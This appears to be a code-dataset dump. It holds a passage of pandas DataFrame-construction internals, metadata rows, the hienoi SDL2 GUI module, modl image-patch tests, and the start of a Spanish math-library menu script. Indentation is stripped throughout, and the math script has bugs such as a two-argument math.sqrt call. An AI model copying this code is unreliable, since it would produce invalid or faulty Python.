# TODO: should we cast these to list?
return v
v = extract_array(v, extract_numpy=True)
res = maybe_convert_platform(v)
return res
# we could have a 1-dim or 2-dim list here
# this is equiv of np.asarray, but does object conversion
# and platform dtype preservation
if is_list_like(values[0]):
values = np.array([convert(v) for v in values])
elif isinstance(values[0], np.ndarray) and values[0].ndim == 0:
# GH#21861
values = np.array([convert(v) for v in values])
else:
values = convert(values)
else:
# drop subclass info
values = np.array(values, copy=copy)
if values.ndim == 1:
values = values.reshape((values.shape[0], 1))
elif values.ndim != 2:
raise ValueError(f"Must pass 2-d input. shape={values.shape}")
return values
def _homogenize(data, index: Index, dtype: DtypeObj | None):
oindex = None
homogenized = []
for val in data:
if isinstance(val, ABCSeries):
if dtype is not None:
val = val.astype(dtype)
if val.index is not index:
# Forces alignment. No need to copy data since we
# are putting it into an ndarray later
val = val.reindex(index, copy=False)
# TODO extract_array should be preferred, but that gives failures for
# `extension/test_numpy.py` (extract_array will convert numpy arrays
# to PandasArray), see https://github.com/pandas-dev/pandas/issues/40021
# val = extract_array(val, extract_numpy=True)
val = val._values
else:
if isinstance(val, dict):
if oindex is None:
oindex = index.astype("O")
if isinstance(index, (ABCDatetimeIndex, ABCTimedeltaIndex)):
val = dict_compat(val)
else:
val = dict(val)
val = lib.fast_multiget(val, oindex._values, default=np.nan)
val = sanitize_array(
val, index, dtype=dtype, copy=False, raise_cast_failure=False
)
homogenized.append(val)
return homogenized
def _extract_index(data) -> Index:
"""
Try to infer an Index from the passed data, raise ValueError on failure.
"""
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
indexes: list[list[Hashable] | Index] = []
have_raw_arrays = False
have_series = False
have_dicts = False
for val in data:
if isinstance(val, ABCSeries):
have_series = True
indexes.append(val.index)
elif isinstance(val, dict):
have_dicts = True
indexes.append(list(val.keys()))
elif is_list_like(val) and getattr(val, "ndim", 1) == 1:
have_raw_arrays = True
raw_lengths.append(len(val))
if not indexes and not raw_lengths:
raise ValueError("If using all scalar values, you must pass an index")
if have_series:
index = union_indexes(indexes)
elif have_dicts:
index = union_indexes(indexes, sort=False)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError("All arrays must be of the same length")
if have_dicts:
raise ValueError(
"Mixing dicts with non-Series may lead to ambiguous ordering."
)
if have_series:
assert index is not None # for mypy
if lengths[0] != len(index):
msg = (
f"array length {lengths[0]} does not match index "
f"length {len(index)}"
)
raise ValueError(msg)
else:
index = ibase.default_index(lengths[0])
# error: Argument 1 to "ensure_index" has incompatible type "Optional[Index]";
# expected "Union[Union[Union[ExtensionArray, ndarray], Index, Series],
# Sequence[Any]]"
return ensure_index(index) # type: ignore[arg-type]
def reorder_arrays(
arrays: list[ArrayLike], arr_columns: Index, columns: Index | None
) -> tuple[list[ArrayLike], Index]:
# reorder according to the columns
if columns is not None and len(columns) and len(arr_columns):
indexer = ensure_index(arr_columns).get_indexer(columns)
arr_columns = ensure_index([arr_columns[i] for i in indexer])
arrays = [arrays[i] for i in indexer]
return arrays, arr_columns
def _get_names_from_index(data) -> Index:
has_some_name = any(getattr(s, "name", None) is not None for s in data)
if not has_some_name:
return ibase.default_index(len(data))
index: list[Hashable] = list(range(len(data)))
count = 0
for i, s in enumerate(data):
n = getattr(s, "name", None)
if n is not None:
index[i] = n
else:
index[i] = f"Unnamed {count}"
count += 1
return Index(index)
def _get_axes(
N: int, K: int, index: Index | None, columns: Index | None
) -> tuple[Index, Index]:
# helper to create the axes as indexes
# return axes or defaults
if index is None:
index = ibase.default_index(N)
else:
index = ensure_index(index)
if columns is None:
columns = ibase.default_index(K)
else:
columns = ensure_index(columns)
return index, columns
def dataclasses_to_dicts(data):
"""
Converts a list of dataclass instances to a list of dictionaries.
Parameters
----------
data : List[Type[dataclass]]
Returns
--------
list_dict : List[dict]
Examples
--------
>>> @dataclass
>>> class Point:
... x: int
... y: int
>>> dataclasses_to_dicts([Point(1,2), Point(2,3)])
[{"x":1,"y":2},{"x":2,"y":3}]
"""
from dataclasses import asdict
return list(map(asdict, data))
# ---------------------------------------------------------------------
# Conversion of Inputs to Arrays
def to_arrays(
data, columns: Index | None, dtype: DtypeObj | None = None
) -> tuple[list[ArrayLike], Index]:
"""
Return list of arrays, columns.
"""
if isinstance(data, ABCDataFrame):
if columns is not None:
arrays = [
data._ixs(i, axis=1).values
for i, col in enumerate(data.columns)
if col in columns
]
else:
columns = data.columns
arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
return arrays, columns
if not len(data):
if isinstance(data, np.ndarray):
if data.dtype.names is not None:
# i.e. numpy structured array
columns = ensure_index(data.dtype.names)
arrays = [data[name] for name in columns]
return arrays, columns
return [], ensure_index([])
elif isinstance(data[0], Categorical):
# GH#38845 deprecate special case
warnings.warn(
"The behavior of DataFrame([categorical, ...]) is deprecated and "
"in a future version will be changed to match the behavior of "
"DataFrame([any_listlike, ...]). "
"To retain the old behavior, pass as a dictionary "
"DataFrame({col: categorical, ..})",
FutureWarning,
stacklevel=4,
)
if columns is None:
columns = ibase.default_index(len(data))
return data, columns
elif isinstance(data, np.ndarray) and data.dtype.names is not None:
# e.g. recarray
columns = Index(list(data.dtype.names))
arrays = [data[k] for k in columns]
return arrays, columns
if isinstance(data[0], (list, tuple)):
arr = _list_to_arrays(data)
elif isinstance(data[0], abc.Mapping):
arr, columns = _list_of_dict_to_arrays(data, columns)
elif isinstance(data[0], ABCSeries):
arr, columns = _list_of_series_to_arrays(data, columns)
else:
# last ditch effort
data = [tuple(x) for x in data]
arr = _list_to_arrays(data)
content, columns = _finalize_columns_and_data(arr, columns, dtype)
return content, columns
def _list_to_arrays(data: list[tuple | list]) -> np.ndarray:
# Returned np.ndarray has ndim = 2
# Note: we already check len(data) > 0 before getting hre
if isinstance(data[0], tuple):
content = lib.to_object_array_tuples(data)
else:
# list of lists
content = lib.to_object_array(data)
return content
def _list_of_series_to_arrays(
data: list,
columns: Index | None,
) -> tuple[np.ndarray, Index]:
# returned np.ndarray has ndim == 2
if columns is None:
# We know pass_data is non-empty because data[0] is a Series
pass_data = [x for x in data if isinstance(x, (ABCSeries, ABCDataFrame))]
columns = get_objs_combined_axis(pass_data, sort=False)
indexer_cache: dict[int, np.ndarray] = {}
aligned_values = []
for s in data:
index = getattr(s, "index", None)
if index is None:
index = ibase.default_index(len(s))
if id(index) in indexer_cache:
indexer = indexer_cache[id(index)]
else:
indexer = indexer_cache[id(index)] = index.get_indexer(columns)
values = extract_array(s, extract_numpy=True)
aligned_values.append(algorithms.take_nd(values, indexer))
# error: Argument 1 to "vstack" has incompatible type "List[ExtensionArray]";
# expected "Sequence[Union[Union[int, float, complex, str, bytes, generic],
# Sequence[Union[int, float, complex, str, bytes, generic]],
# Sequence[Sequence[Any]], _SupportsArray]]"
content = np.vstack(aligned_values) # type: ignore[arg-type]
return content, columns
def _list_of_dict_to_arrays(
data: list[dict],
columns: Index | None,
) -> tuple[np.ndarray, Index]:
"""
Convert list of dicts to numpy arrays
if `columns` is not passed, column names are inferred from the records
- for OrderedDict and dicts, the column names match
the key insertion-order from the first record to the last.
- For other kinds of dict-likes, the keys are lexically sorted.
Parameters
----------
data : iterable
collection of records (OrderedDict, dict)
columns: iterables or None
Returns
-------
content : np.ndarray[object, ndim=2]
columns : Index
"""
if columns is None:
gen = (list(x.keys()) for x in data)
sort = not any(isinstance(d, dict) for d in data)
pre_cols = lib.fast_unique_multiple_list_gen(gen, sort=sort)
columns = ensure_index(pre_cols)
# assure that they are of the base dict class and not of derived
# classes
data = [(type(d) is dict) and d or dict(d) for d in data]
content = lib.dicts_to_array(data, list(columns))
return content, columns
def _finalize_columns_and_data(
content: np.ndarray, # ndim == 2
columns: Index | None,
dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index]:
"""
Ensure we have valid columns, cast object dtypes if possible.
"""
contents = list(content.T)
try:
columns = _validate_or_indexify_columns(contents, columns)
except AssertionError as err:
# GH#26429 do not raise user-facing AssertionError
raise ValueError(err) from err
if len(contents) and contents[0].dtype == np.object_:
contents = _convert_object_array(contents, dtype=dtype)
return contents, columns
def _validate_or_indexify_columns(
content: list[np.ndarray], columns: Index | None
) -> Index:
"""
If columns is None, make numbers as column names; Otherwise, validate that
columns have valid length.
Parameters
----------
content : list of np.ndarrays
columns : Index or None
Returns
-------
Index
If columns is None, assign positional column index value as columns.
Raises
------
1. AssertionError when content is not composed of list of lists, and if
length of columns is not equal to length of content.
2. ValueError when content is list of lists, but length of each sub-list
is not equal
3. ValueError when content is list of lists, but length of sub-list is
not equal to length of content
"""
if columns is None:
columns = ibase.default_index(len(content))
else:
# Add mask for data which is composed of list of lists
is_mi_list = isinstance(columns, list) and all(
isinstance(col, list) for col in columns
)
if not is_mi_list and len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError(
f"{len(columns)} columns passed, passed data had "
f"{len(content)} columns"
)
elif is_mi_list:
# check if nested list column, length of each sub-list should be equal
if len({len(col) for col in columns}) > 1:
raise ValueError(
"Length of columns passed for MultiIndex columns is different"
)
# if columns is not empty and length of sublist is not equal to content
elif columns and len(columns[0]) != len(content):
raise ValueError(
f"{len(columns[0])} columns passed, passed data had "
f"{len(content)} columns"
)
return columns
def _convert_object_array(
content: list[np.ndarray], dtype: DtypeObj | None
) -> list[ArrayLike]:
"""
Internal function to convert object array.
Parameters
----------
content: List[np.ndarray]
dtype: np.dtype or ExtensionDtype
Returns
-------
List[ArrayLike]
"""
# provide soft conversion of object dtypes
def convert(arr):
if dtype != np.dtype("O"):
arr = lib.maybe_convert_objects(arr)
arr = maybe_cast_to_datetime(arr, dtype)
return arr
arrays = [convert(arr) for arr in content]
return arrays
|
bsd-3-clause
| -271,554,817,022,136,300
| 30.013
| 88
| 0.585077
| false
| 3.960286
| false
| false
| false
|
christophercrouzet/hienoi
|
hienoi/gui.py
|
1
|
20220
|
"""Graphical user interface."""
import collections
import ctypes
import sdl2
import hienoi.renderer
from hienoi._common import GLProfile, GraphicsAPI, ParticleDisplay, UserData
from hienoi._vectors import Vector2i, Vector2f, Vector4f
class NavigationAction(object):
"""Enumerator for the current nagivation action.
Attributes
----------
NONE
MOVE
ZOOM
"""
NONE = 0
MOVE = 1
ZOOM = 2
_Handles = collections.namedtuple(
'_Handles', (
'window',
'renderer',
))
_GLHandles = collections.namedtuple(
'_GLHandles', (
'context',
))
_RGBMasks = collections.namedtuple(
'_RGBMasks', (
'red',
'green',
'blue',
))
_FIT_VIEW_REL_PADDING = 2.0
if sdl2.SDL_BYTEORDER == sdl2.SDL_LIL_ENDIAN:
_RGB_MASKS = _RGBMasks(red=0x000000FF, green=0x0000FF00, blue=0x00FF0000)
else:
_RGB_MASKS = _RGBMasks(red=0x00FF0000, green=0x0000FF00, blue=0x000000FF)
class GUI(object):
"""GUI.
Parameters
----------
window_title : str
Title for the window.
window_position : hienoi.Vector2i
Initial window position.
window_size : hienoi.Vector2i
Initial window size.
window_flags : int
SDL2 window flags.
view_aperture_x : float
Initial length in world units to be shown on the X axis.
view_zoom_range : hienoi.Vector2f
Zoom value range for the view.
mouse_wheel_step : float
Coefficient value for each mouse wheel step.
grid_density : float
See :attr:`GUI.grid_density`.
grid_adaptive_threshold : float
See :attr:`GUI.grid_adaptive_threshold`.
show_grid : bool
See :attr:`GUI.show_grid`.
background_color : hienoi.Vector4f
See :attr:`GUI.background_color`.
grid_color : hienoi.Vector4f
See :attr:`GUI.grid_color`.
grid_origin_color : hienoi.Vector4f
See :attr:`GUI.grid_origin_color`.
particle_display : int
See :attr:`GUI.particle_display`.
point_size : int
See :attr:`GUI.point_size`.
edge_feather : float
See :attr:`GUI.edge_feather`.
stroke_width : float
See :attr:`GUI.stroke_width`.
initialize_callback : function
Callback function to initialize any GUI state.
It takes a single argument ``gui``, an instance of this class.
on_event_callback : function
Callback function ran during the event polling.
It takes 3 arguments: ``gui``, an instance of this class,
``data``, some data to pass back and forth between the caller and this
callback function, and ``event``, the event fired.
renderer : dict
Keyword arguments for the configuration of the renderer. See the
parameters for the class :class:`hienoi.renderer.Renderer`.
Attributes
----------
view_position : hienoi.Vector2f
Position of the view (camera).
view_zoom : float
Current zoom value for the view.
grid_density : float
Density of the grid.
A density of 10.0 means that there are around 10 grid divisions
displayed on the X axis. A grid division unit represents a fixed length
in world units, meaning that the actual grid density changes depending
on the view's zoom.
show_grid : bool
True to show the grid.
background_color : hienoi.Vector4f
Color for the background.
grid_color : hienoi.Vector4f
Color for the grid.
grid_origin_color : hienoi.Vector4f
Color for the origin axis of the grid.
particle_display : int
Display mode for the particles. Available values are enumerated in the
:class:`~hienoi.ParticleDisplay` class.
point_size : int
Size of the particles in pixels when the display mode is set to
:attr:`~hienoi.ParticleDisplay.POINT`.
edge_feather : float
Feather fall-off in pixels to apply to objects drawn with displays such
as :attr:`~hienoi.ParticleDisplay.CIRCLE` or
:attr:`~hienoi.ParticleDisplay.DISC`.
stroke_width : float
Width of the stroke in pixels to apply to objects drawn with displays
such as :attr:`~hienoi.ParticleDisplay.CIRCLE`.
quit : bool
``True`` to signal to the application that it should quit.
has_view_changed : bool
``True`` if the view state has just been changed following an event. It
is reset to ``False`` whenever :meth:`poll_events` is called.
user_data : object
Attribute reserved for any user data.
"""
def __init__(self,
window_title='hienoi',
window_position=Vector2i(sdl2.SDL_WINDOWPOS_CENTERED,
sdl2.SDL_WINDOWPOS_CENTERED),
window_size=Vector2i(800, 600),
window_flags=sdl2.SDL_WINDOW_RESIZABLE,
view_aperture_x=100.0,
view_zoom_range=Vector2f(1e-6, 1e+6),
mouse_wheel_step=0.01,
grid_density=10.0,
grid_adaptive_threshold=3.0,
show_grid=True,
background_color=Vector4f(0.15, 0.15, 0.15, 1.0),
grid_color=Vector4f(0.85, 0.85, 0.85, 0.05),
grid_origin_color=Vector4f(0.85, 0.25, 0.25, 0.25),
particle_display=ParticleDisplay.DISC,
point_size=4,
edge_feather=2.0,
stroke_width=0.0,
initialize_callback=None,
on_event_callback=None,
renderer=None):
renderer = {} if renderer is None else renderer
if sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO) != 0:
raise RuntimeError(sdl2.SDL_GetError().decode())
renderer_info = hienoi.renderer.get_info()
if renderer_info.api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_MAJOR_VERSION,
renderer_info.major_version)
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_MINOR_VERSION,
renderer_info.minor_version)
if renderer_info.profile == GLProfile.CORE:
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_PROFILE_MASK,
sdl2.SDL_GL_CONTEXT_PROFILE_CORE)
self._handles = _create_handles(window_title, window_position,
window_size, window_flags,
renderer_info)
self._renderer = hienoi.renderer.Renderer(**renderer)
self._initial_view_aperture_x = view_aperture_x
self._view_zoom_range = view_zoom_range
self._mouse_wheel_step = mouse_wheel_step
self._grid_adaptive_threshold = grid_adaptive_threshold
self._on_event_callback = on_event_callback
self._listen_for_navigation = False
self._is_view_manipulated = False
self.view_position = Vector2f(0.0, 0.0)
self._view_zoom = 1.0
self.grid_density = grid_density
self.show_grid = show_grid
self.background_color = background_color
self.grid_color = grid_color
self.grid_origin_color = grid_origin_color
self.particle_display = particle_display
self.point_size = point_size
self.edge_feather = edge_feather
self.stroke_width = stroke_width
self._navigation_action = NavigationAction.NONE
self.quit = False
self.user_data = UserData()
if initialize_callback:
initialize_callback(self)
@property
def view_zoom(self):
return self._view_zoom
@view_zoom.setter
def view_zoom(self, value):
self._view_zoom = max(self._view_zoom_range[0],
min(self._view_zoom_range[1], value))
@property
def navigation_action(self):
return self._navigation_action
@property
def has_view_changed(self):
return self._has_view_changed
def poll_events(self, scene_state, data=None):
"""Process each event in the queue.
Parameters
----------
scene_state : hienoi.renderer.SceneState
Scene state.
data : object
Data to pass back and forth between the caller and the function set
for the 'on event' callback.
"""
self._has_view_changed = False
event = sdl2.SDL_Event()
while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
event_type = event.type
if event_type == sdl2.SDL_QUIT:
self._on_quit_event(event.quit)
elif event_type == sdl2.SDL_WINDOWEVENT:
self._on_window_event(event.window)
elif event_type == sdl2.SDL_KEYDOWN:
self._on_key_down_event(event.key, scene_state)
elif event_type == sdl2.SDL_KEYUP:
self._on_key_up_event(event.key)
elif event_type == sdl2.SDL_MOUSEBUTTONDOWN:
self._on_mouse_button_down_event(event.button)
elif event_type == sdl2.SDL_MOUSEBUTTONUP:
self._on_mouse_button_up_event(event.button)
elif event_type == sdl2.SDL_MOUSEWHEEL:
self._on_mouse_wheel_event(event.wheel)
elif event_type == sdl2.SDL_MOUSEMOTION:
self._on_mouse_motion_event(event.motion)
if self._on_event_callback:
self._on_event_callback(self, data, event)
if self.quit:
break
def render(self, scene_state):
"""Render a new frame.
Parameters
----------
scene_state : hienoi.renderer.SceneState
Scene state.
"""
renderer_state = hienoi.renderer.State(
window_size=self.get_window_size(),
view_position=self.view_position,
view_zoom=self._view_zoom,
origin=self.world_to_screen(Vector2f(0.0, 0.0)),
initial_view_aperture_x=self._initial_view_aperture_x,
view_aperture=self.get_view_aperture(),
grid_density=self.grid_density,
grid_adaptive_threshold=self._grid_adaptive_threshold,
background_color=self.background_color,
grid_color=self.grid_color,
grid_origin_color=self.grid_origin_color,
show_grid=self.show_grid,
particle_display=self.particle_display,
point_size=self.point_size,
edge_feather=self.edge_feather,
stroke_width=self.stroke_width,
)
self._renderer.render(renderer_state, scene_state)
if hienoi.renderer.get_info().api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_SwapWindow(self._handles.window)
def terminate(self):
"""Cleanup the GUI resources."""
self._renderer.cleanup()
if hienoi.renderer.get_info().api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_DeleteContext(self._handles.renderer.context)
sdl2.SDL_DestroyWindow(self._handles.window)
sdl2.SDL_Quit()
def get_window_size(self):
"""Retrieve the window size.
Returns
-------
hienoi.Vector2i
The window size.
"""
window_size_x = ctypes.c_int()
window_size_y = ctypes.c_int()
sdl2.SDL_GetWindowSize(self._handles.window,
ctypes.byref(window_size_x),
ctypes.byref(window_size_y))
return Vector2i(window_size_x.value, window_size_y.value)
def get_view_aperture(self):
"""Retrieve the view aperture.
It represents the area in world units covered by the view.
Returns
-------
hienoi.Vector2f
The view aperture.
"""
window_size = self.get_window_size()
aperture_x = self._initial_view_aperture_x / self._view_zoom
return Vector2f(aperture_x, aperture_x * window_size.y / window_size.x)
def get_mouse_position(self):
"""Retrieve the mouse position in screen space.
Returns
-------
hienoi.Vector2i
The mouse position.
"""
position_x = ctypes.c_int()
position_y = ctypes.c_int()
sdl2.SDL_GetMouseState(ctypes.byref(position_x),
ctypes.byref(position_y))
return Vector2i(position_x.value, position_y.value)
def get_screen_to_world_ratio(self):
"""Retrieve the ratio to convert a sreen unit into a world unit.
Returns
-------
float
The screen to world ratio.
"""
window_size = self.get_window_size()
aperture_x = self._initial_view_aperture_x / self._view_zoom
return aperture_x / window_size.x
def screen_to_world(self, point):
"""Convert a point from screen space to world space coordinates.
Parameters
----------
point : hienoi.Vector2i
Point in screen space coordinates.
Returns
-------
hienoi.Vector2f
The point in world space coordinates.
"""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
return Vector2f(
(self.view_position.x
+ (point.x - window_size.x / 2.0)
* view_aperture.x / window_size.x),
(self.view_position.y
- (point.y - window_size.y / 2.0)
* view_aperture.y / window_size.y))
def world_to_screen(self, point):
"""Convert a point from world space to screen space coordinates.
Parameters
----------
point : hienoi.Vector2f
Point in world space coordinates.
Returns
-------
hienoi.Vector2i
The point in screen space coordinates.
"""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
return Vector2i(
int(round(
(window_size.x / view_aperture.x)
* (-self.view_position.x + point.x + view_aperture.x / 2.0))),
int(round(
(window_size.y / view_aperture.y)
* (self.view_position.y - point.y + view_aperture.y / 2.0))))
def write_snapshot(self, filename):
"""Take a snapshot of the view and write it as a BMP image.
Parameters
----------
filename : str
Destination filename.
"""
pixel_size = 4
pixels = self._renderer.read_pixels()
surface = sdl2.SDL_CreateRGBSurfaceFrom(
pixels.data, pixels.width, pixels.height,
8 * pixel_size, pixels.width * pixel_size,
_RGB_MASKS.red, _RGB_MASKS.green, _RGB_MASKS.blue, 0)
sdl2.SDL_SaveBMP(surface, filename)
sdl2.SDL_FreeSurface(surface)
def _reset_view(self):
"""Reset the view position and zoom."""
self.view_position = Vector2f(0.0, 0.0)
self.view_zoom = 1.0
self._has_view_changed = True
def _fit_view(self, scene_state):
"""Fit the view to the scene."""
if len(scene_state.particles) > 1:
window_size = self.get_window_size()
initial_size = Vector2f(
self._initial_view_aperture_x,
self._initial_view_aperture_x * window_size.y / window_size.x)
lower_bounds = scene_state.lower_bounds
upper_bounds = scene_state.upper_bounds
required_size = (upper_bounds - lower_bounds).iscale(
_FIT_VIEW_REL_PADDING)
required_size = Vector2f(
max(required_size.x,
initial_size.x * self._view_zoom_range[0]),
max(required_size.y,
initial_size.y * self._view_zoom_range[0]))
self.view_position = (lower_bounds + upper_bounds).iscale(0.5)
self.view_zoom = min(initial_size.x / required_size.x,
initial_size.y / required_size.y)
elif len(scene_state.particles) == 1:
self.view_position = Vector2f(
*scene_state.particles['position'][0])
self.view_zoom = 1.0
else:
self._reset_view()
self._has_view_changed = True
def _on_quit_event(self, event):
"""Event 'on quit'."""
self.quit = True
def _on_window_event(self, event):
"""Event 'on window'."""
if event.event == sdl2.SDL_WINDOWEVENT_SIZE_CHANGED:
self._renderer.resize(event.data1, event.data2)
def _on_key_down_event(self, event, scene_state):
"""Event 'on key down'."""
code = event.keysym.sym
modifier = event.keysym.mod
if modifier == sdl2.KMOD_NONE:
if code == sdl2.SDLK_SPACE:
self._listen_for_navigation = True
elif code == sdl2.SDLK_d:
self.particle_display = (
(self.particle_display + 1) % (ParticleDisplay._LAST + 1))
elif code == sdl2.SDLK_f:
self._fit_view(scene_state)
elif code == sdl2.SDLK_g:
self.show_grid = not self.show_grid
elif code == sdl2.SDLK_r:
self._reset_view()
def _on_key_up_event(self, event):
"""Event 'on key up'."""
code = event.keysym.sym
if code == sdl2.SDLK_SPACE:
self._listen_for_navigation = False
def _on_mouse_button_down_event(self, event):
"""Event 'on mouse button down'."""
if self._listen_for_navigation:
if event.button == sdl2.SDL_BUTTON_LEFT:
self._navigation_action = NavigationAction.MOVE
elif event.button == sdl2.SDL_BUTTON_RIGHT:
self._navigation_action = NavigationAction.ZOOM
def _on_mouse_button_up_event(self, event):
"""Event 'on mouse button up'."""
if (event.button == sdl2.SDL_BUTTON_LEFT
or event.button == sdl2.SDL_BUTTON_RIGHT):
self._navigation_action = NavigationAction.NONE
def _on_mouse_wheel_event(self, event):
"""Event 'on mouse wheel'."""
scale = 1.0 + self._mouse_wheel_step * event.y
self.view_zoom *= scale
self._has_view_changed = True
def _on_mouse_motion_event(self, event):
"""Event 'on mouse motion'."""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
if self._navigation_action == NavigationAction.MOVE:
self.view_position.set(
(self.view_position.x
- event.xrel * view_aperture.x / window_size.x),
(self.view_position.y
+ event.yrel * view_aperture.y / window_size.y))
self._has_view_changed = True
elif self._navigation_action == NavigationAction.ZOOM:
scale = (1.0
+ float(event.xrel) / window_size.x
- float(event.yrel) / window_size.y)
self.view_zoom *= scale
self._has_view_changed = True
def _create_handles(window_title, window_position, window_size, window_flags,
renderer_info):
"""Create the SDL2 handles."""
window_flags = sdl2.SDL_WINDOW_SHOWN | window_flags
if renderer_info.api == GraphicsAPI.OPENGL:
window_flags |= sdl2.SDL_WINDOW_OPENGL
window = sdl2.SDL_CreateWindow(
window_title.encode(),
window_position.x, window_position.y,
window_size.x, window_size.y,
window_flags)
if not window:
raise RuntimeError(sdl2.SDL_GetError().decode())
context = sdl2.SDL_GL_CreateContext(window)
if not context:
raise RuntimeError(sdl2.SDL_GetError().decode())
# Try to disable the vertical synchronization. It applies to the active
# context and thus needs to be called after `SDL_GL_CreateContext`.
sdl2.SDL_GL_SetSwapInterval(0)
return _Handles(
window=window,
renderer=_GLHandles(context=context))
|
mit
| 9,104,025,055,639,628,000
| 34.851064
| 79
| 0.574233
| false
| 3.823752
| false
| false
| false
|
arthurmensch/modl
|
modl/input_data/tests/test_image.py
|
1
|
1754
|
import numpy as np
from modl.input_data.image import scale_patches
from modl.input_data.image_fast import clean_mask, fill
from numpy.testing import assert_array_almost_equal, assert_array_equal
from sklearn.feature_extraction.image import extract_patches
from sklearn.utils import check_random_state
def test_scale_patches():
patch_size = (8, 8, 3)
n = 100
shape = (n, ) + patch_size
rs = check_random_state(0)
X = rs.randn(*shape)
Y = scale_patches(X, with_mean=True, with_std=True, channel_wise=True)
assert_array_almost_equal(Y.mean(axis=(1, 2)), 0)
assert_array_almost_equal(np.sum(Y ** 2, axis=(1, 2)), 1 / 3)
scale_patches(X, with_mean=True, with_std=True, channel_wise=True,
copy=False)
assert_array_equal(X, Y)
X = rs.randn(*shape)
Y = scale_patches(X, with_mean=False, with_std=True, channel_wise=True)
assert_array_almost_equal(np.sum(Y ** 2, axis=(1, 2)), 1 / 3)
Y = scale_patches(X, with_mean=True, with_std=False, channel_wise=True)
assert_array_almost_equal(Y.mean(axis=(1, 2)), 0)
Y = scale_patches(X, with_mean=True, with_std=True, channel_wise=False)
assert_array_almost_equal(Y.mean(axis=(1, 2, 3)), 0)
assert_array_almost_equal(np.sum(Y ** 2, axis=(1, 2, 3)), 1)
def test_clean():
A = np.ones((64, 64, 3))
A[:2, :, :] = -1
A[-2:, :, :] = -1
A[:, :2, :] = -1
A[:, -2:, :] = -1
patches = extract_patches(A, (8, 8, 3))
idx = clean_mask(patches, A)
mask = np.zeros((64, 64, 3))
mask[2:55, 2:55, 0] = 1
true_idx = np.c_[np.where(mask)]
assert_array_almost_equal(idx, true_idx)
def test_fill():
p, q, r = 10, 10, 10
assert_array_equal(np.c_[np.where(np.ones((p, q, r)))], fill(p, q, r))
|
bsd-2-clause
| -5,648,527,415,653,365,000
| 32.730769
| 75
| 0.611745
| false
| 2.749216
| false
| false
| false
|
charre2017idv/MathDinamita
|
Math_Lib/Math_Lib/Math_Lib.py
|
1
|
28504
|
import math
import os
n=0
print ("MATHLIB (TM)2017")
print ("-"*50)
print ("Las funciones que puede realizar la libreria son las siguientes:")
print ("")
'''En esta parte se crea el menú principal'''
print ("FUNCIONES BASICAS:")
print ("")
print ("-(1) Suma ")
print ("-(2) Multiplicacion ")
print ("-(3) Division")
print ("-(4) Modulo")
print ("-(5) Potencia")
print ("-(6) Raiz")
print ("-(7) Verificacion de numeros primos")
print ("-(8) Rango de numeros primos")
print ("")
print ("FUNCIONES DE CONVERSION:")
print ("")
print ("-(9) Binario -> Hexadecimal")
print ("-(10) Binario -> Decimal")
print ("-(11) Decimal -> Hexadecimal")
print ("-(12) Decimal -> Binario")
print ("-(13) Hexadecimal -> Binario")
print ("-(14) Hexadecimal -> Decimal")
print ("-(15) Metros -> Yardas")
print ("-(16) Yardas -> Metros")
print ("-(17) Metros -> Pulgadas")
print ("-(18) Pulgadas -> Metros")
print ("")
print ("FUNCIONES ADICIONALES: ")
print ("")
print ("-(19) Indice de Masa Corporal [IMC]")
print ("")
print ("-"*50)
'''Aqui empezamos a establecer los parametros de lo que sucedera dependiendo
del numero que introduzca el usuario'''
while (n<1 or n>19):
n=int(input("Escriba el numero de la funcion a realizar: "))
if (n<1 or n>19):
print ("Ese numero es invalido. Por favor, ingrese una opcion permitida")
print ("")
print ("-"*50)
os.system("cls")
"""Aqui definimos algunas de las funciones que vamos a ocupar en el repositorio"""
def suma (a):
return a
def multiplicacion (a):
return a
def division (a,b):
return float(a/b)
def modulo (a,b):
return a%b
def potencia (a,b): #Falta que se pueda ingresar decimal
return float(a**b)
def raiz (a,b):
return math.sqrt(a,b)
def BaH (a):
return a
def DaH (a):
return a
def DaB (a):
return a
def HaB (a): # El codigo que se ejecuta esta en el Num 13
if (a == "0"): # Primer valor de numeros hex que se convertiran
cambio = "0000" # Primer valor de bin que se convertiran
elif ( a == "1"): # Segundo valor de numeros hex que se convertiran
cambio = "0001" # Segundo valor de bin que se convertiran
elif (a == "2"):
cambio = "0010"
elif (a == "3"):
cambio = "0011"
elif (a == "4"):
cambio = "0100"
elif (a == "5"):
cambio = "0101"
elif (a == "6"):
cambio = "0110"
elif (a == "7"):
cambio = "0111"
elif (a == "8"):
cambio = "1000"
elif (a == "9"):
cambio = "1001"
elif (a == "A" or a == "a"):
cambio = "1010"
elif (a == "B" or a == "b"):
cambio = "1011"
elif (a == "C" or a == "c"):
cambio = "1100"
elif (a == "D" or a == "d"):
cambio = "1101"
elif (a == "E" or a == "e"):
cambio = "1110"
elif (a == "F" or a == "f"):
cambio = "1111"
else:
cambio = "Ese valor no es valido."
numero = input("Ingresa un valor hexadecimal :")
print ("-"*50)
return cambio
def HaD (a):
return a
def BaD (a):
return a
def primos (a,b):
return (a,b)
def primosrang (a,b):
return (a,b)
'''SUMA
En esta funcion se puede sumar dos variables que el usuario decida y obtener valores numericos nuevos.
'''
if (n==1) : #Suma
print ("---SUMA---")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Suma---")
print ("(1) Ingresar la cantidad de numeros a sumar")
print ("(2) Ingresar las cifras individualmente y presionar 'Enter' para registrarlas")
print ("(3) Una vez ingresados todos los datos su respuesta se imprimira presionando 'Enter'")
print ("")
#A continuación se le pedide al usuario ingresar la cantidad de numeros a sumar
a=(input("Escriba cantidad de numeros a sumar: "))
